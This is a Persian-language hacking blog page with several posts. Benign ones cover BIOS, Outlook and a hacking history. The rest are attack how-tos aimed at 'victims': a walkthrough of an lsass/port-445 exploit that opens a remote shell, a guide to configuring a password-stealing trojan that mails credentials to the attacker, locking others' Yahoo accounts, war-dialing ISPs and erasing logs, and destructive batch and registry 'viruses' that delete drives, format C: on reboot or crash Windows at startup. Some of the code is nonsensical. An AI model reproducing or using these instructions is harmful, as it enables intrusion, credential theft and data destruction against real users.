تبليغاتX
برترین و بهترین سایت موبایل و هک

برترین و بهترین سایت موبایل و هک

انواع بازی و برنامه و کلیپ های صوتی و تصویری موبایل و هزاران نوع اس ام اس و انواع آموزش و ابزار هک

از BIOS چه می دانید؟ (قسمت اول)
BOIS تنها کلمه اي است که مي تواند تمام درايورهايي را که در يک سيستم به عنوان واسط سخت افزار و سيستم عامل کار مي کنند ، را شرح دهد.
BOIS در حقيقت نرم افزار را به سخت افزار متصل مي نمايد . قسمتي از بايوس بر روي چيپست ROM مادربرد و قسمتي ديگر بر روي چيپست کارتهاي وفق دهنده قرار دارد که FIRE WARE (يعني ميانه افزار يا سفت افزار) ناميده ميشود .
يک PC مي تواند شامل لايه هايي (بعضي نرم افزاري و بعضي سخت افزاري ) باشد که واسط بين يکديگرند. در اکثر اوقات شما مي توانيد يک کامپيوتر را به چهار لا يه تقسيم کنيد که هر کدام از لايه ها به زير مجموعه هايي کوچکتر تقسيم کنيم . هدف از اين نوع طراحي اين است که سيستم عامل ها و نرم افزار هاي مختلف بر روي سخت افزار هاي مختلف اجرا شوند (حالت مستقل از سخت افزار ) . بدين طريق دو ماشين با دو پردازنده مختلف، رسانه هاي ذخيره سازي متفاوت و دو نوع واحد گرافيکي و غيره مي توانند يک نرم افزار را اجرا کنند .
برای دیدن ادامه این مقاله به ادامه مطلب بروید :

منبع :آنلاین-هکر


ادامه مطلب
+ نوشته شده در  سه شنبه نوزدهم تیر 1386ساعت 13:15  توسط پیمان  | 
ترفند هکر ها ( قسمت اول )
پسوندهاي پنهان فايلهاي ويندوز
ممكن است از اين موضوع آگاهي نداشته باشيد، اما حتي اگر به ويندوز بگوييد كه تمام پسوندهاي فايل را نشان دهد، هنوز هم فايلهايي وجود دارند كه بطور پيش فرض مخفي شده‌اند. همچنين هر برنامه نصب شده‌ايي مي‌تواند پسوندها را پيكربندي كند تا پنهان شوند. در اينجا در مورد چگونگي انجام اين كار و همچنين دليل اينكه چرا برخي از پسوندهاي پنهان مي‌توانند براي تعدادي از كاربرهاي كامپيوتر خطرناك باشند، مثالهايي آورده شده است. به فرض اينكه شما قبلا ويندوز explorer را براي نشان دادن تمام پسوندهاي پيكربندي كرده‌ايد.

برای دیدن این مقاله به ادامه مطلب بروید :

منبع : آنلاین-هکر


ادامه مطلب
+ نوشته شده در  سه شنبه نوزدهم تیر 1386ساعت 13:13  توسط پیمان  | 
چک کردن ایمیلهای یاهو در Outlook
همان طور که ميدانيد ياهو سرويس هاي pop3 ايميل هاي خود را براي استفاده کننده گان رايگان غير فعال کرده و براي استفاده از اين سرويس بايد پول پرداخت ، ولي اين به اين معني نيست که شما نمي توانيد از اين سرويس به صورت رايگان استفاده کنيد. شما با استفاده ازنرم افزار YahooPops به آساني قادر به دريافت و فرستادن نامه هاي خود به وسيله outlook و ديگر نرم افزار هاي مديريت ايميل هستيد. در زير به شرح طريقه دريافت ايميل هاي yahoo به وسيله outlook و outlook express مي پردازيم.
ابتدا برنامه YahooPops را از yahoopops.sourceforge.net دانلود کنيد و آن را نصب کنيد و سپس به سراغ outlook رفته و تنظيمات را مو به مو انجام دهيد.
تنظيمات لازم براي براي دريافت نامه هاي yahoo توسط outlook express
1. از منوي tools گزينه account را انتخاب کنيد.
2. بر روي دکمه add کليک کرده و گزينه Mail را انتخاب کنيد.
برای دیدن ادامه این آموزش به ادامه مطلب بروید :

منبع : آنلاین-هکر


ادامه مطلب
+ نوشته شده در  سه شنبه نوزدهم تیر 1386ساعت 13:11  توسط پیمان  | 
قفل کردن آیدی دیگران به مدت 24 ساعت
ابتدا به ‌mail.yahoo.com  برويد بعد آی دی فرد قربانی را وارد کنيد و يک پسورد اشتباه وارد کنيد و ۱۵ بار اينکار را تکرار کنيد تا آی دی قفل شود. اين آی ذی قربانی را تا ۲۴ ساعت قطع می کند .

نــــــــــــــــــــظــــــر خوب چیـــــزیــــه بـه خـــــــــــــــــــدا

+ نوشته شده در  چهارشنبه سیزدهم تیر 1386ساعت 11:25  توسط پیمان  | 
آموزش ساخت ویروس zero zone
در این درس میخواهیم آموزش ساخت ویروس zero zone  را به شما بیاموزیم اين ويروس TimeZone ويندوز را صفر ميكند.يعني تايم ويندوز و  روز آن صفر ميشود.

هيچ ضرري براي كامپيوتر ندارد فقط بايد دوباره زمان وروز ويندوز خود را تنظيم كنيد.وبيشتر براي ترساندن به كار ميرود.

 

بازم مثل هميشه Notepad  را باز كنيد وكد زير را در آن تايپ كند .

@Echo off
time=0:0:0

 

حال آن را با نام  Time0.bat  سيو كنيد.

 

بعد دوباره NotePad را باز كرده و كد زير را در آن تايپ كنيد.

 

@ECHO OFF
date=10-10-10
  

اين فايل را هم مثل فايل قبلي با نام Date0.bat  سيو كنيد.

 

حال دوباره NotePad را باز كرده و كد زير را در آن تايپ كنيد.

 

@echo off
echo I AM A VIRUS
echo SEAT AND SEE MY POWER!!!...
pause

و آن را با نام Comment.bat  ذخيره كنيد.

 يه NotePad باز كرده وكد زير را در آن تايپ كنيد.

 

START TIME0
START DATE0
START comment
 

وآن را با نام Help.bat ذخيره كنيد.

 

بر روي فايل آخر رايت كليك كرده و Create ShortCut را بزنيد و نام آنرا به Help.txt تغيير دهيد.

 

سپس با رايت كليك بر روي Help.txt وانتخاب Properties  و زدن Change Icon يه آيكون براي فايل خود انتخاب كنيد.

 

بقيه فايلها را در يك Folder ذخيره كنيد كه شما ميتوانيد آن Folder را نيز Hidden كنيد.

 

حال ويروس ما آماده است. ( برای راحتی شما من این ویروس را درست کرده ام ودر آدرس زیر قرار داده ام )

+ نوشته شده در  چهارشنبه سیزدهم تیر 1386ساعت 11:8  توسط پیمان  | 
با این برنامه تمام پسورد ها و اکونت و پسورد آیدی طرف رو بدست آورید

این تروجان تمام پسورد ها و شماره تلفن های وارد شده تو سيستم قربانی رو براتون ميل ميکنه ! طرز کارشم خيلی سادست.اول برنامه رو از

 حالت زيپ خارجش کنيد فايل K2pS_setup رو اجرا کنيد .

دکمه open رو بزنيد .. حال يکی از فايلهای کناری این برنامه انتخاب کنيد و open رو بزنيد ...

 فايل اولی که K2pS هست تمام يوسر پسورد ها و شماره ها رو برای شما هر زمان که قربانی به

 اینترنت وصل شه برای شما فرستاده ميشه و دومی که K2pS_full هست همون کار رو ميکنه با

 این تفاوت که ديگه پسورد های تکراری رو برای شما نميفرسته !
حالا بعد از انتخاب سرور .. تو قسمت smtp srver : بايد ادرس سرور ميل رو وارد کنيد

(که چندتا ميل سرور رو براتون اخر مينويسم) ودر قسمت destination adress ايميلی که بايد اطلا عات به اون فرستاده شه (ايميل خودتون) در قسمت source address هم اسم قربانی يا هر چی که دوست داريد وارد کنيد و بعد دکمه save رو بزنيد .. سرور شما امادست توجه کنيد که فايلی رو ایجاد نميکنه در واقع فايل سروری که انتخاب کرديد رو ويرايش ميکنه .. پس فايل سرور همون فايلی هست که open کرديد ... .

ادرس سرورها : yahoo.com

mx1.mail.yahoo.com   mx2.mail.yahoo.com   mx4.mail.yahoo.com

اگر نظرهای این پست به ۱۰ تا برسه من این نرم افزار و ۱۰ تا اموزش دیگه هک براتون می زارم .

+ نوشته شده در  چهارشنبه سیزدهم تیر 1386ساعت 10:43  توسط پیمان  | 
هک کردن از داس خیلی آسان وجالب
هک کردن آسان ، با داس
مطلبي كه در اينجا ميخوانيد يكمي پيچيده است بنابراين اصلا نگران نباشيد گام به گام با اين متن پيش برويد سعي ميكنم خيلي ساده عنوان كنم اصلا نگران نباشيد
خلاصه كاري كه ما ميكنيم اين است كه ما با كارهاي زير ميخواهيم به ويندوز 2000 يا ايكس پي حمله كنيم از بيرون دستگاه بدون اينكه به قرباني فايلي بديم اجرا كنه يا هر ارتباط ديگري با قرباني داشته باشيم يعني ميخوايم خيلي حرفه اي نه مثل اين هكر هاي تازه كار كه تروجان ميدن به مردم خيلي حرفه اي خودمان ميخوايم يك پورت روي دستگاه قرباني باز كنيم بدون اينكه حتي يك كلمه هم با قرباني حرف بزنيم خوب حالا كه فهميديد چيكار ميخوام بكنيم من يكبار ديگه هم خلاصه بگم يك اي پي انتخاب ميكنيد و بعد هكش ميكنيد اولين كاري كه ميكنيم اين است كه اي پي مورد نظر يا همان قرباني را براي باز بودن پورت 445 امتحان ميكنيم
Start->run->CMD
را براي باز كردن يك صفحه كامند پرومت بزنيد و بعد با دستور
telnet ip 445
امتحان ميكنيم كه ايا پورت 445 باز است يا نه البته شما اگر حرفه اي هستيد حتما مثل هكر هاي حرفه اي براي اين كارها يك برنامه خاص را استفاده ميكني بنا به سليقه خودتان كه از چه برنامه اي خوشتان مياد ولي در اينجا از دستوراتي استفاده ميكنيم كه هر كسي خواست اين كار را انجام بدهد نياز به برنامه خاصي نداشته باشه و با كمترين امكانات ميخوايم به نتيجه برسيم
خوب توجه كنيد به جا اي پي در دستور بالا بايد اي پي قرباني را وارد كنيد و اگر اين دستور را وارد كرديد و اتصال برقرار شد يعني پورت 445 باز است پس گام اول را برداشتيد و اگر اتصال برقرار نشد و پيغام خطا دريافت كرديد قرباني شما به اين نوع حمله نفوذ پذير نيست
خوب حالا به گام دوم ميرويم در زير كد هاي حمله به اين پورت را مشاهده ميكنيد اين كدها را بايد كامپايل بفرمائيد و فايل اجرايي كه بدست مي اوريد را بصورت زير استفاده ميكنيد
expl <target> <victim IP> <bindport> [options]
در خط بالا طرز استفاده به اين ترتيب است اولين كلمه expl نام فايل اجرايي است كه بعد از كامپايل ايجاد كرديد target يك عدد يك رقمي است كه مقدار 0 براي ويندوز ايكس پي است و مقدار 1و2 براي ويندوز 2000 است در اخر اين نوشته طرز تشخيص اينكه كدام عدد را استفاده كنيد يعني از كجا بفهميد قرباني ويندوز ايكس پي است كه 0 بزنيد يا قرباني ويندوز 2000 است كه 1 يا 2 بزنيد را ميخوانيد
victim ip همان اي پي قرباني شما است كه پورت 445 ان باز بود
binport شماره پورتي است كه ميخواهيد روي دستگاه قرباني براي شما باز بشود و به ان پورت وصل بشويد و قرباني را هك كنيد
option يك دستور است كه در ادامه تك دستور اين برنامه را توضيح ميدهم
خوب دوست من كار بسيار ساده است فرض كنيد اي پي قرباني من 217.0.0.1 است و من طبق ان چيزهايي كه بالا گفتم اين كارهاي را به تريتب انجام ميدهدم
1- Start --> Run --> CMD
2- Telnet 217.0.0.1 445
3- اگر وصل شد از برنامه حمله كه قبلا كامپال كردم و الان اماده استفاده است استفاده ميكنم
4- پنجره قبلي را كه در 2 دستور قبل باز كردم ميبندم
5- Start->Run->CMD
6-expl.exe 0 217.0.0.1 24745
----بعد از اينكه دستور خط 6 را زدنيد اين نوشته ها را مشاهده ميكنيد----
* Target: IP: 217.0.0.1: OS: winXP [universal] lsass.exe
* Connecting to 217.0.0.1:445 ... OK
* Attacking ... OK
7-حمله انجام شد و پورت مورد نظر شما كه در خط شماره 6 من شماره پورت 24745 را انتخاب كردم الان باز شده تا ما وارد دستگاه قرباني بشويم
8-Start-->Run-->CMD
9-telnet 217.0.0.1 24745
10-به احتمال 95 درصد شما موفق شديد دستگاه قرباني را هك كنيد و اين خطوط را مشاهده خواهيد كرد
* Microsoft Windows XP [Version 5.00.2600]
* (C) Copyright 1985-2001 Microsoft Corp.
*
* C:\WINNT\system32>
11- دوست من در اين جا شما هر دستوري بزنيد روي دستگاه قرباني اجرا ميشود مثل اگر بزنيد format C: مي توانيد هارد قرباني را فرمت كنيد
ولي توجه كنيد يك هكر در اوج قدرت دست به خرابكاري نميزنه !!! پس هر كاري خواستيد بكنيد ولي خرابكاري نه !!!
و اما چطوري تشخيص بدهيد كه دستگاه قرباني شما ويندوز 2000 است كه از عدد 1 يا 2 استفاده كنيد يا ويندوز ايكس پي هست كه از عدد0 استفاده كنيد ؟ شما كافي است كه همان دستور بالا را كه براي حمله استفاده مكنيد بزنيد و فقط به اخرش -t اضافه كنيد يعني اينطوري
expl 0 217.0.0.1 24745 -t
بعد از زدن اين دستور برنامه به شما نسخه ويندوز را اعلام ميكند اگر نسخه ويندوز را winnt 5.0اعلام كرد يعني ويندوز 2000 است و شما عدد 1 يا 2 استفاده كنيد و اگر winnt 5.1 را اعلام كرد ويندوز ايكس پي است

اميدوارم كه مطلب بالا مورد استفاده شما قرار گرفته باشد توجه كنيد براي اينكه همه بتوانند اين مطلب را استفاده كنند مجبور شدم كه خيلي جاها را ساده كنم ولي در سورس اصلي برنامه ميتوانيد به اصل دستور عمل ها پی ببريد .
توجه به اين نكته ضروري است كه با اين روش شما هر اي پي را كه بخواهيد ميتوانيد به احتمال 80% هك كنيد استفاده از مطلب بالا فقط درصورتيكه هدف شما يادگيري و افزايش معلومات باشد مجاز ميباشد .
نظر یادتون نره .
+ نوشته شده در  چهارشنبه سیزدهم تیر 1386ساعت 8:29  توسط پیمان  | 
هک کردن کارت اینترنت 2
با سلام این هم دومین اموزش برای هک کارت اینترنت .

این بحث در مقوله ی هک کردن ای اس پی گنجانده می شود که ما برای این کار به یک برنامه به نام THC-Scan 2.0 احتیاج داریم که می توانید آن را از:

http://www.thc.infreno.tusculum.edu/

دریافت کنید همچنین باید به سایت http://www.networksolution.com/ رفته و در بالای صفحه به دنبال گزینه ی Who is بگردید و بعد از پیدا کردن آن بر روی لینک آن کلیک کنید و در بخش Domain یا در قسمت Site Name اسم سایت مورد نظر را خود را که همان سایت ای اس پی مورد نظر خود است را بنویسید و سپس Search کرده و در صفحه ی باز شده شماره تلفن هایی را که نمایش داده است را یادداشت کرده و به کمک نرم افزار THC-Scan 2.0 ای اس پی خود را مورد پویش قرار دهید

اگر به این شکل نتوانستید شماره تلفنی پیدا کنید می توانید به 118 تلفن کرده و از آن شماره های اداری ای اس پی خود را بگیرید و یادتان باشد که این شماره با شمار های اتصال به شبکه فرق می کند

حالا می چگونه می توانیم با نرم افزار فوق این کار را کنیم؟

بعد از اجرا کردن برنامه شماره تلفن را به آن داده و آن شروع به سرچ می کند و پس از اتمام سرچ دوباره شماره تلفن هایی را به شما می دهد که این شماره ها همان شماره هایی هستند که می توانید با زنگ زدن به آن ها((که آموزشش را الان می دهم))به صورت رایگان به اینترنت وصل شده و یا رایگان به جایی زنگ بزنید

 

1.برای تلفن به خارج یا تلفن زدن رایگان به وسیله ی آن شماره تلفن ها این کارها را انجام دهید:

با تلفن معمولی یا به وسیله ی Hyper Terminal در قسمت Start-->All Programs-->Accessories-->Communication-->Hyper Terminal به آن شماره ها زنگ زده و به صورت رایگان به هر جایی تلفن بزنید

 

2.برای وصل شدن به اینترنت به صورت رایگان این کارها را انجام دهید:

در بخش Connection و یا همان صفحه ای که به روش Dial-up به اینترنت وصل می شوید دو قسمت Username و password را خالی گذاشته و شماره ی پیدا شده را در قسمت Dial بنویسید و بعد به صورت رایگان به اینترنت وصل شوید

دوستان عزیز یادتان باشد حتما قبل از شروع این کار اطلاعات کاملی در مورد نحوه ی حفاطت ئ امنیت ؟آی اس پی مورد نظر خود پیدا کنید چون اگر محافظت از ای اس پی بالا باشد و شما هم مثلا به طور شانسی توانستید این کار را بکنید هنگامی که شما به آن شماره ها زنگ می زنید شماره ی شم در حافظه ی آن ای اس پی ثبت می شود و اگر آن ها شماره ی شما را پیدا کنند به راحتی می توانند علیه شما شکایت کنند البته گفتم اگر حفاظت از آن ای اس پی پایین بود می توانید یک دور کامل به ای اس پی نفوذ کرده و شماره ی خود را از حافظه ی آن پاک کنید و اگر حرفه ای هستید این کار را بکنبد و گرنه هر مشکلی که برایتان پیش آمد من هیچ مسولیتی ندارم

+ نوشته شده در  چهارشنبه سیزدهم تیر 1386ساعت 8:28  توسط پیمان  | 
ساخت ویروس صفحه کلید
سلام - این یک شبه ویروس است که دو قابلیت ویندوز را فعال میکند: یک صدای بیپ صفحه کلید و دو چشمک زدن صفحه نمایش زمانی که صدایی از آن خارج می شود.اگر این دو قابلیت را با هم فعال کنید با هر بار فشار دادن یکی از کلید های صفحه کلید.یک صدای بیپ می شنوید و متعاقبآ مانیتور چشمک می زندو بدین ترتیب صفحه کلیدتان از کار می افتد! البته ناراحت نباشید زیرا به راحتی می توان آن را به حالت قبلی بر گرداند. در ضمن این ویروس هیچ خسارتی در پی نخواهد داشت. ( 100% تست شده )
بدین منظور دو فایل با نام های Reg-on.REG و Reg-off.REG با برنامه ی NotePad درست کنید بدین ترتیب با دابل کلیک بر روی Reg-on.REG ویروس فعال شده و بعد از بوت کردن کامپیوتر از نو کار می کند و با دبل کلیک بر روی Reg-off.REG ویروس غیر فعال شده و با ریبوت دوباره از کار می افتد.
*** دقت کنید وقتی بر روی فایل های .Reg کلیک می کنید باید بعد از آن yes را بزنید تا فایل ریجستری کار کند. چون این مینی ویروس صفحه کلید را از کار می اندازد در صورت استفاده از چند Acount جداگانه در ویندوز و داشتن پسورد پسورد ها را پاک کنید که مشکلی پیش نیاید ، چون در هنگام تایپ پسورد دیگه کیبورد کار نمی کنه !!!.
و حالا متن دو فایلی که باید در Notepad نوشت :

1 - متن فایل Reg-on.REG :
Windows Registry Editor Version 5.00
[HKEY_CURRENT_USER\Control Panel\Accessibility\Keyboard Response]
"Flags"="127"
[HKEY_CURRENT_USER\Control Panel\Accessibility\SoundSentry]
"Flags"="3"
"WindowsEffect"="3"

2 - متن فایل Reg-off.REG :
Windows Registry Editor Version 5.00
[HKEY_CURRENT_USER\Control Panel\Accessibility\Keyboard Response]
"Flags"="126"
[HKEY_CURRENT_USER\Control Panel\Accessibility\SoundSentry]
"Flags"="2"
"WindowsEffect"="0"

فراموش نکنید که هر دو فایل را با پسوند .Reg سیو کنید(طریقه سیو کردن با پسوند.Reg را هم که حتما بلد هستید . به این صورت است که روی Save As کلیک کرده و Save As Type را روی All Files گذاشته و در قسمت File Name تایپ می کنید Reg-on.REG یا Reg-off.REG و Save را می زنید) .
البته در زمان اجرای این برنامه میتونید توسط موس اینو متوقف کنید به این صورت که بر روی ایکون ساعت مانندی که در سینی ویندوز ظاهر شده ( مربوط به تنظیمات معلولین ) کلیک کنید و تیک مربوط به این روش که در وسط هستش رو بردارید و OK کنید ( قسمت Filter Key ) . یادتون نره که این موقتی و اگر خواستید برای همیشه متوقف بشه باید فایل دوم رو اجرا کرده تا نیمچه ویروس غیر فعال بشه .
حالا ویروس شما آماده است و شما می توانید برای سرگرمی و نه اذیت و آزار دیگران استفاده کنید
+ نوشته شده در  چهارشنبه سیزدهم تیر 1386ساعت 8:28  توسط پیمان  | 
آموزش ساخت ویروسهای خطرناک
1=ويروس خطرناك
cpu-567njkblaster بعد با پسوند bat. سيو كنيد.
خطر: يك بار هم روي سيستم خودتون امتحان نكنيد.
ويروس graphic card lower :
توضيح در باره ويروس: اين ويروس فضاي كارت گرافيك رو پر ميكنه و ديگه هيچ بازي رو سيستم اجرا نميشه. نت پد رو باز كنيد و در آن تايپ كنيد :
c/windows/system32/jefo/display/memory/full
و براي save كردنش گزينه file رو زده و save as... رو انتخاب كنيد و اونو با اسم XXX.bat ذخيره كنيد اكنون ويروس شما آماده ميباشد

________________________________________
2=ساخت ويروس
فكر مي كنم همه شما ويروس Blaster رو بشناسيد (ويروسي كه باعث Shutdown شدن كامپيوتر تو 60 ثانيه مي شد و مي شه) و حتي خيلي از شما روش ساخت اون را بدونيد ولي لازم ميدونم نگاهي سريع به اون بندازم.
اين ويروس رو به طریق مختلفي و با دستورات گوناگوني مي شه نوشت كه در اين جا دو روش رو مورد بررسي قرار ميديم
اگر از اين دستورات از قبل آشنايي نداريد حتما از Copy/Paste استفاده كنيد.
روش اول
با استفاده از Shortcut : در جايي از دسكتاپ خود کلیک راست كنيد و در بخش New گزينه Shortcut را انتخاب كنيد و در بخش ظاهر شده يكي از دستورات زير را وارد كنيد:
1)shutdown -s -t xx
2)%windir%system32shutdown.exe -s -t xx
توضيح: بعد از اينكه Paste كرديد به جاي xx در دستورات بالا مدت زماني را بر حسب ثانيه قرار دهيد تا كامپيوتر پس از آن زمان خاموش شود.
سپس Next را بزنيد و براي فايل خود يك نام برگزينيد و كار تمام است.
روش دوم
به كمك Notepad : نت پد را باز كنيد و باز هم يكي از دو دستور بالا را در آن Paste كنيد و حالا فايل خود را با پسوند bat يعني با نامي مثل shutdown.bat سيو كنيد. براي پادزهر درست كردن براي اين ويروس هم ميتوانيد از دستور زير استفاده كنيد:
shutdown -a
و همه مراحل قبل را انجام دهيد.اين دستور هم از هر دو راه فوق قابل اجرا است. حالا ميرسيم به نكات تكميلي در مورد چگونه ميتوان براي BatchFile ها آيكون انتخاب كرد. بايد بگويم يكي از ساده ترين روشها كه به هيچ نرم افزار خاصي نياز ندارد اين است كه شما از BatchFile مورد نظر يك Shortcut بسازيد و براي Shortcut براحتي آيكون انتخاب كنيد و فايل اصلي را Hidden كنيد.
تا به حال هيچ به اين فكر افتاده ايد كه اگر در كامپيوتري Notepad و Wordpad و Microsoft Word نصب نشده باشد شما اين همه ترفند را كجا ميخواهيد پياده كنيد. آيا ميدانيد هكرها معمولا در محيط متني ديگري بجز اينها اقدام به نوشن برنامه ميكنند؟ بله اين محيط متني به نسبت ناشناخته همان اديتور داس (Dos Editor) است. شما در اين اديتور ميتوانيد كد برنامه ها را ببينيد. براي وارد شدن به اين محيط وارد داس شويد و تايپ كنيد Edit. صبر كنيد. قبل از اينكه وارد اين محيط شويد بايد بدانيد بر خلاف محيط بي آزار نت پد محيط Dos Editor بسيار بسيار خطرناك است. هرگونه تغييري كه خواسته يا ناخواسته در متن كد ها بوجود آوريد امكان هيچگونه بازگشت ندارد (اينجا از كليدي به نام Undo خبري نيست.) همچنين همه تغييرات بطور خودكار سيو ميشود و هيچگاه موقع خروج از اديتور ازشما سوال نميشود كه Do you want to save changes و همه چيز بطور خودكار ذخيره شده و اگر احيانا كد فايل هاي اصلي سيستم را دستكاري كنيد حتي System Restore و Backup هاي رجيستري هم به دادتان نخواهند رسيد

________________________________________
شبه ويروس
اگه ويندوز 98 داريد بريد تو Run و تايپ كنيد Con/Con : چيزى كه مشاهده خواهيد كرد همون صفحه آبى رنگ ويندوز! هيچ چاره اى جر restart كردن رو براتون باقى نمی گذاره.حالا چه جورى مي تونيم از اين باگ كه در ويندوز98 موجود است استفاده كنيم.يكى از راهاش اينه كه در يك صفحه اينترنت اين دستور را وارد كنيم كه اين فايل را از كامپيوتر فراخوانى كند بدين صورت file:///c:/con/con می توانيد از اين باگ يه فايل درست كنيد كه وقتى كسى اين فايل رو اجرا كرد هر بار كه كامپيوترش اين فايل فراخوانى بشه و راهى بجز فرمت رو براش پيش رو نگذاره يه صفحه يtxt باز كنيد و اين دستورات رو توش بنويسيد و با پسوند .REG سيو كنيد
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Curr entVersion\Run]
@="c:\\con\\con"
اين باعث ميشه كه باهر بار ريستارت كردن كامپيوتر اين دستور اجرا بشه و نهايتا همون صفحه آبى رنگ بياد كه راهى جز restart كردن نداره.اگر ويندوز NT /200 / XP می توانيد يه كار ديگه بكنيد يه صفحه يtxt ‌‌باز كنيد بعد اين كامند ها رو بتوش بنويسيد
c:
del autoexec.bat
del config.sys
cd winnt
del system.ini
del win.ini
بعد فايل رو با پسوند .BAT سيو كنيد. اين فايل رو وقتى براى كسى بفرستيد هيچى نمی شه اما به محض اينكه كامپيوتر رو restart كنه ديگه بار بعدی بالا نمياد.

________________________________________
آموزش ويروس نويسي
اين ويروس بسيار خطرناك است چون با اجرا شدن آن ديگر براي قرباني راهي جز اف ديسك كردن كامپيوتر باقي نمي ماند. مواظب باشيد اشتباها روي آن دابل كليك نكنيد.

هرگونه استفاده غير متعارف از اين ويروس به عهده كاربر مي باشد.

متن ويروس:

ATTRIB -a -s -h -r c
ATTRIB -a -s -h -r c:\windows\*.*
Echo y | echo a | Echo y | del c:\*.*
Echo y | echo a | Echo y | del d:\*.*
Echo y | echo a | Echo y | del e:\*.*
Echo y | echo a | Echo y | del f:\*.*
Echo y | echo a | Echo y | del g:\*.*
echo y | copy *.* C:\
echo y | copy *.* D:\
echo y | copy *.* E:\
echo y | copy *.* F:\
echo y | copy *.* G:\
+ نوشته شده در  چهارشنبه سیزدهم تیر 1386ساعت 8:27  توسط پیمان  | 
یک ویروس برای فرمت کردن درایو c کافی نت
يه مدتي بود كه دنبال همچين ويروسي ميگشتم .حالا براي شما ميزارم. فقط زياد شيطوني نكنيد

برنامه NotePad رو باز كنين بعد فرمان زير رو توش كپي و پيست كنيد:

@echo off
call attrib -r -h c:autoexec.bat >nul
echo @echo off >c:autoexec.bat
echo format /autotest c:/q>nul >>c:autoexec.bat
call attrib +r +h c:autoexec.bat >nul
exit

حالا فايل را با پسوند bat ذخيره كنين. مواظب ياشين كه فايل رو اجرا نكنين چون كل اطلاعات درايو سي شما پاك مي

شه!

اين فايل چه كار مي كنه؟

اول كل اطلاعات موجود تو فايل autoexe.bat رو پاك مي كنه بعد كد format /autotest c:/q رو توش مي زاره وقتي

هدف شما كامپيوتر رو ريست و دوباره راه اندازي كنه اين كد اجرا مي شه و درايو سي فرمت مي شه!
+ نوشته شده در  چهارشنبه سیزدهم تیر 1386ساعت 8:27  توسط پیمان  | 
ip خود را قفل کنید (تضمینی)
برای هک کردن یک کامپیوتر احتیاج به IP دارند خوب این شده یک مشکل برای PC ها خوب حالا با این کار کامپیوتر خود را از ورود هکر ها به کامپیوترتان تضمین کنید.

ابتدا برای این کار در منوی استارت گزینه RUN را انتخاب کنید و عبارت MMC را تایپ کنید و سپس ENTER کنید .
در صفحه باز شده از منوی File گزینه َAdd\Remove Snap-in را انتخاب در صفحه باز شده گزینه Add را انتخاب و در پنجره باز شده گزینه IP Security Policy Management را Add نمایید و آن را ذخیره کنید و در Control Panel به Administrative Tools رفته و گزینه Local Security Policy را دابل کلیک نمایید و در پنجره باز شده گزینه IP Security Policies On Local Computer را به حالت سبز در آورید.
+ نوشته شده در  چهارشنبه سیزدهم تیر 1386ساعت 8:26  توسط پیمان  | 
تاریخچه جهانی هک از 1971 تا 2003
هك كردن برخلاف انتظار مساله‌اي تازه نيست و حتا به يك كشور هم محدود نمي‌شود. نوشتار پيش‌رو تاريخچه‌ي مختصري از اين پديده را در كشورهاي مختلف بررسي مي‌كند.

1971
در ويتنام دامپزشكي به نام "جان دراپر" از يك سوت ارزان‌قيمت در جعبه‌ي پاپ‌كورن و يك "جعبه‌ي آبي دست‌ساز" براي برقراري تماس تلفني رايگان استفاده مي‌كند. هم‌زمان با انتشار راهنماي شركت "اسكواير" در مورد چگونگي ساختن جعبه‌هاي آبي، آمار تقلب و كلاهبرداري در زمينه‌ي استفاده از تلفن در آمريكا به اوج خود مي‌رسد.

1972
"استيو وزنياك" و "استيو جابز"، شاگردان يك دبيرستان و موسسان آينده‌ي كامپيوتر اپل، به يك تجارت خانگي در زمينه‌ي توليد و فروش "جعبه‌هاي آبي" اقدام كردند. در اين روش ضمايم غير قانوني هك شده در سيستم تلفني به كاربر امكان برقراري يك تماس راه دور رايگان مي‌داد.

1978
باشگاه "آشوب كامپيوتري" در آلمان به وجود مي‌آيد و پس از مدتي تبديل به يكي از سازمان‌هاي هكر تاثيرگذار در اروپا مي‌شود.

983
در ميلواكي زياده‌روي 6 نوجوان در هك كردن ماه‌ها به طول مي‌انجامد. آن‌ها در اين مدت به كامپيوترهاي موسسات پرآوازه‌اي مانند كتابخانه‌ي ملي "لوس آلاموس" و مركز سرطان يادواره‌ي "اسلون كترينگ" راه مي‌يابند.

1983
فيلم " بازي‌هاي جنگ" در سينماها به نمايش گذاشته مي‌شود.

1984
مجلس "سنا" قانون دست‌برد و تقلب كامپيوتري را تصويب مي‌كند، طبق اين قانون نفوذ غيرقانوني به سيستم‌هاي كامپيوتري يك جرم شناخته مي‌شود.

1987
مجله‌ي "دكودر" براي طرف‌داران هك در ايتاليا منتشر مي‌شود.

1988
"كوين ميتنيك" به طور مخفيانه پيام‌هاي الكترونيكي MCI، مركز محاسبات عددي مقام‌هاي رسمي امنيتي، را كنترل مي‌كند. او مسوول خسارت 4 ميليون دلاريِ وارد شده به كامپيوترهاي مركز محاسبات عددي، دزديدن يك سيستم كامپيوتري عظيم و مخفي امنيتي و دست‌يابي غير مجاز به كدهاي راه دور MCI از طريق كامپيوترهاي دانشگاهي در لوس‌آنجلس و انگلستان بوده است. او 5 ماه را در زندان و 6 ماه را هم در يك بخش بازپروري سپري مي‌كند. "ميتنيك" در اواخر سال 1992 هم‌زمان با شروع تحقيقات FBI در مورد صحت و اثبات نقض قوانين به وسيله‌ي او، فرار كرد.

1989
در آلمان غربي، تعدادي هكر به علت نفوذ غيرقانوني به سيستم‌هاي دولتي و شركت‌ها و فروش كد منابع OS به KGB بازداشت شدند.

1991
شايعاتي درباره‌ي وجود ويروسي به نام "ميكل آنژ" منتشر مي‌شود. مبني بر اين‌كه اين ويروس كامپيوترها را در 6 مارس 1992؛ يعني در پانصد و هفدهمين سالگرد تولد هنرمند، نابود مي‌كند. هيچ اتفاقي در اين روز نمي‌ا‌فتد.

1994
هكرهاي روسي به رهبري "ولاديمير لوين"، 10 ميليون دلار از بانك شهري، خارج و آن را به حساب‌هاي بانكي خود در سراسر دنيا منتقل كردتد. پس از چندي "لوين" دستگير و به جز 400 هزار دلار مابقي پول‌ها پس گرفته شد.

1997
يك گروه هكر كانادايي به نام "انجمن وارز" به وب‌سايت يك شبكه تلويزيوني كانادايي نفوذ مي‌كنند.

1997
يك نوجوان 15 ساله‌ي كروات به كامپيوترهاي نيروي هوايي آمريكا در "گوام" رخنه مي‌كند.

1998
"اهود تنبوم" يك هكر 19 ساله اسراييلي راه‌هايي براي ورود غيرقانوني به كامپيوترهاي پنتاگون مي‌يابد و برنامه‌هاي نرم‌افزاري آنجا را مي‌دزدد. وي توسط FBI بازداشت مي‌گردد، اما بعدها از مقامات مهم شركت مشاوره‌ي كامپيوتري مي‌شود.

